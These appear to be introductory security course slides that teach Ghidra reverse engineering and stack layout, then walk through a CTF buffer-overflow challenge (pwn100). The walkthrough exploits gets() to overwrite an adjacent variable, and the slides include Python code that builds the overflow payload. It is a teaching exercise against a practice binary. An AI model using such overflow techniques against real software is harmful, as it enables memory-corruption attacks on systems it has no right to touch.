How do programs work?
INTROSEC 2019
Obligatory links
In case you missed it
Tools we will be using (on the vm already)
What is a ghidra
For now Ghidra is just a static analysis platform
The NSA claims a debugger will be integrated soon™
Until then we will use GDB for debugging and sync the two in our heads.
Ghidra 101
It has a lot of features:
How does a function get its arguments
Each block is 4 bytes of data (a doubleword)
Registers such as ESP and EBP each hold one doubleword
0x00000000 | ……... |
ESP -----------> | Local Var | param1 |
| Local Var | param2 |
| Local Var | param3 |
| Local Var | param4 |
EBP -----------> | Local Var | param5 |
Previous EBP | |
Return address | |
0xffffffff | ……... |
DEMO TIME?
Stuff you kinda just gotta know
Two hex characters are one byte, so 0x00-0xff covers every value a byte can hold (0-255); 0xffff is 2 bytes, and so on
When displaying bytes it is very common to use hex
At the end of the day all data is just bytes. Your program chooses whether to treat them as ints, chars, etc... or even code
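To make that concrete, here is a small sketch that takes the same four bytes and reads them three different ways. The byte values are picked purely for illustration; the little-endian format ("<I") is an assumption that matches the 32-bit x86 target used in these slides.

```python
import struct

# Four bytes, each somewhere in the range 0x00-0xff.
raw = bytes([0x41, 0x42, 0x43, 0x44])

as_text = raw.decode("ascii")          # treat them as four 1-byte chars
as_int = struct.unpack("<I", raw)[0]   # treat them as one little-endian 4-byte int
as_hex = raw.hex()                     # two hex characters per byte

print(as_text)      # ABCD
print(hex(as_int))  # 0x44434241
print(as_hex)       # 41424344
```

Nothing about the bytes changed between the three prints, only the interpretation.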
pwn100
Each block is 4 bytes of data (a doubleword)
Chars are 1 byte
Ints are 4 bytes
Registers such as ESP and EBP each hold one doubleword
0x00000000 | ……... |
ESP -----------> | foo[0:4] |
| foo[4:8] |
| foo[8:12] |
| foo[12:16] |
| foo[16:20] |
| Int points |
EBP -----------> | Local Var | param5 |
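The layout in the diagram can be modelled with ctypes to double-check the arithmetic. This is only a sketch: the class name Frame is made up, and it assumes the two locals sit back to back with foo at the lower address, as drawn above.

```python
import ctypes

class Frame(ctypes.Structure):
    # Hypothetical model of the two locals, lowest address first.
    _fields_ = [
        ("foo", ctypes.c_char * 20),  # 20 one-byte chars = five 4-byte blocks
        ("points", ctypes.c_int32),   # one 4-byte int, directly above foo
    ]

print(Frame.foo.offset, Frame.foo.size)        # 0 20
print(Frame.points.offset, Frame.points.size)  # 20 4
print(ctypes.sizeof(Frame))                    # 24
```

So points starts exactly 20 bytes after the start of foo, which is the number that matters later.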
pwn100
Let’s improve the disassembly
Name variables by pressing L
……... |
local_28 |
local_24 |
local_20 |
local_1c |
local_18 |
local_14 |
local_10 |
local_c |
......... |
pwn100
What do we name them?
Look at how they’re used and just make up something believable
pwn100
Then just press L and rename
(Ghidra closes the graph view to refresh, just re-open it)
……... |
local_28 ⇒ “name” |
local_24 |
local_20 |
local_1c |
local_18 |
local_14 |
local_10 |
local_c |
......... |
pwn100
Okay that seems to make sense
Protip: see all uses of a variable by middle-clicking it (Mac users: use a mouse or change it in the settings)
pwn100
Where are local_24 → local_18?
Ghidra thinks they are part of “name”
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 |
local_10 |
local_c |
......... |
pwn100
local_14?
Looks like the points variable
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 |
local_c |
......... |
pwn100
local_c?
Isn’t used in the stuff we care about
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
pwn100
So the disassembly matches up with our expected stack frame layout
……... |
foo[0:4] |
foo[4:8] |
foo[8:12] |
foo[12:16] |
foo[16:20] |
Int points |
…….. |
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
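The sizes can be read straight off the variable names. The sketch below assumes that the hex suffix in Ghidra's default local_XX names is a stack offset, so subtracting two suffixes gives the distance between the two variables; the helper stack_offset is a made-up name for illustration.

```python
# Assumption: the hex suffix of a default Ghidra local name is its stack offset.
GHIDRA_LOCALS = ["local_28", "local_24", "local_20", "local_1c",
                 "local_18", "local_14", "local_10", "local_c"]

def stack_offset(local_name: str) -> int:
    """Parse the hex suffix of a name like 'local_1c' (hypothetical helper)."""
    return int(local_name.split("_", 1)[1], 16)

offsets = [stack_offset(n) for n in GHIDRA_LOCALS]
gaps = [a - b for a, b in zip(offsets, offsets[1:])]

# name starts at local_28 and points starts at local_14.
name_size = stack_offset("local_28") - stack_offset("local_14")

print(gaps)       # [4, 4, 4, 4, 4, 4, 4]
print(name_size)  # 20
```

Every slot is one doubleword apart, and name spans 20 bytes before points begins, which agrees with the expected frame.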
Back to pwning
So what does this function do?
Back to pwning
How does gets work? Read the manual!
bash$ man gets
Back to pwning
So we read bytes into name with no check for buffer overrun...
Back to pwning
We call gets on name, which is 20 bytes and sits directly below points, so anything past byte 20 lands in points
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
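Here is a rough simulation of why that is a problem. It is not the real gets, just a stand-in (unsafe_gets is a made-up name) that copies the whole line plus a terminating NUL without ever looking at the buffer size. The frame is modelled as a flat bytearray with name at [0:20] and points at [20:24], an assumption taken from the diagram.

```python
import struct

NAME_SIZE = 20  # name occupies frame[0:20], points occupies frame[20:24]

def unsafe_gets(frame: bytearray, line: bytes) -> None:
    """Stand-in for gets: copy the line plus a NUL, ignoring the buffer size."""
    data = line + b"\x00"
    frame[0:len(data)] = data

frame = bytearray(32)                        # name, points, and a few more locals
struct.pack_into("<I", frame, NAME_SIZE, 0)  # points starts out as 0

unsafe_gets(frame, b"A" * 24)                # 4 bytes more than name can hold

points = struct.unpack_from("<I", frame, NAME_SIZE)[0]
print(hex(points))  # 0x41414141
```

The last four 'A's never fit in name, so they ended up as the value of points.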
Back to pwning
What if we spam the alphabet?
ABCDEFGHIJKLMNOPQRSTUVWXYZ
‘A’ == 0x41, ‘B’ == 0x42, etc.
man ascii
Endianness makes this confusing: x86 is little-endian, so the first byte of input ends up as the lowest byte of each doubleword
| ……... |
0x44 43 42 41 DCBA | local_28 ⇒ “name”[0:4] |
0x48 47 46 45 HGFE | local_24 ⇒ “name”[4:8] |
0x4c 4b 4a 49 LKJI | local_20 ⇒ “name”[8:12] |
0x50 4f 4e 4d PONM | local_1c ⇒ “name”[12:16] |
0x54 53 52 51 TSRQ | local_18 ⇒ “name”[16:20] |
0x58 57 56 55 XWVU | local_14 ⇒ “points” |
0x?? ?? 5a 59 ??ZY | local_10 ⇒ ¯\_(ツ)_/¯ |
... | local_c ⇒ ¯\_(ツ)_/¯ |
... | ......... |
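The table above can be reproduced with struct. A sketch, assuming little-endian 4-byte words and the name/points layout from the earlier slides: it unpacks the first 24 letters into six doublewords and prints each next to its slot.

```python
import string
import struct

alphabet = string.ascii_uppercase.encode("ascii")  # b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# The first 24 bytes fill six doublewords: five for name, one for points.
words = struct.unpack("<6I", alphabet[:24])
labels = ["name[0:4]", "name[4:8]", "name[8:12]",
          "name[12:16]", "name[16:20]", "points"]

for label, word in zip(labels, words):
    print(f"0x{word:08x}  {label}")

points = words[5]
leftover = alphabet[24:]  # the bytes that spill into the next local
```

The first line printed is 0x44434241 for name[0:4], and points comes out as 0x58575655, i.e. "UVWX" read back to front.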
Back to pwning
So we can set points to whatever we want
What does it need to be?
Check the cmp!
Oh, thanks Ghidra.
Side step to make Ghidra’s UI less bad
Edit the code layout and drag the Operands box
Government-quality UI right here, folks
… back to pwning
So we can set points to whatever we want
What does it need to be?
Check the cmp!
Back to pwning
So points needs to be 0x1337d00d
Replace the UVWX with those bytes
Again, endianness: they go into the input as 0d d0 37 13
| ……... |
0x44 43 42 41 DCBA | local_28 ⇒ “name”[0:4] |
0x48 47 46 45 HGFE | local_24 ⇒ “name”[4:8] |
0x4c 4b 4a 49 LKJI | local_20 ⇒ “name”[8:12] |
0x50 4f 4e 4d PONM | local_1c ⇒ “name”[12:16] |
0x54 53 52 51 TSRQ | local_18 ⇒ “name”[16:20] |
0x13 37 d0 0d ???? | local_14 ⇒ “points” |
0x?? ?? 5a 59 ??ZY | local_10 ⇒ ¯\_(ツ)_/¯ |
... | local_c ⇒ ¯\_(ツ)_/¯ |
... | ......... |
Back to pwning
So our final input is ABCDEFGHIJKLMNOPQRST\x0d\xd0\x37\x13
Time to gdb!
| ……... |
0x44 43 42 41 DCBA | local_28 ⇒ “name”[0:4] |
0x48 47 46 45 HGFE | local_24 ⇒ “name”[4:8] |
0x4c 4b 4a 49 LKJI | local_20 ⇒ “name”[8:12] |
0x50 4f 4e 4d PONM | local_1c ⇒ “name”[12:16] |
0x54 53 52 51 TSRQ | local_18 ⇒ “name”[16:20] |
0x13 37 d0 0d .7Ð. | local_14 ⇒ “points” |
0x?? ?? ?? 00 ???. | local_10 ⇒ ¯\_(ツ)_/¯ |
... | local_c ⇒ ¯\_(ツ)_/¯ |
... | ......... |
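Instead of reversing the bytes by hand, struct can do it. This sketch builds the input from the slide and then checks it the way the cmp would, assuming points is read as a little-endian doubleword at offset 20; TARGET and NAME_SIZE are just names picked for this example.

```python
import struct

TARGET = 0x1337d00d   # the value the cmp is looking for
NAME_SIZE = 20        # bytes of padding needed to reach points

padding = b"ABCDEFGHIJKLMNOPQRST"
payload = padding + struct.pack("<I", TARGET)  # "<I" = little-endian 4-byte int

print(payload)  # b'ABCDEFGHIJKLMNOPQRST\r\xd07\x13'

# Sanity check: read points back out of the payload the way the CPU would.
points = struct.unpack_from("<I", payload, NAME_SIZE)[0]
print(hex(points))  # 0x1337d00d
```

Python prints 0x0d as \r and 0x37 as the character 7, but the bytes are the same 0d d0 37 13 as on the slide.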
GDB shows us how it works
Feel free to look at the older slides for how to GDB
Protip: Run python in gdb so you can debug weird input
gdb-peda$ run < <(python -c 'print("\x41\x41\x41\x41")')
^ The space between the first < and the <( is necessary (without it the shell sees <<). Thanks, gdb!
Demo
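One thing to watch out for if the python on your machine is Python 3: print works on text, so on a typical UTF-8 setup a character like "\xd0" is written as two bytes (c3 90) instead of one. A sketch of a small script that writes raw bytes instead; the function names and the file name payload.py mentioned below are made up for this example.

```python
import struct
import sys

def build_payload() -> bytes:
    """20 bytes of padding followed by the little-endian target value."""
    return b"ABCDEFGHIJKLMNOPQRST" + struct.pack("<I", 0x1337d00d)

def emit(stream) -> None:
    """Write the payload as raw bytes, plus the newline that ends the input line."""
    stream.write(build_payload() + b"\n")

if __name__ == "__main__":
    # sys.stdout.buffer is the binary stream underneath print's text stream.
    emit(sys.stdout.buffer)
```

Saved as payload.py (hypothetical name), it can be used the same way as the one-liner: run < <(python3 payload.py)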
Remember branchier from Friday?
Next Steps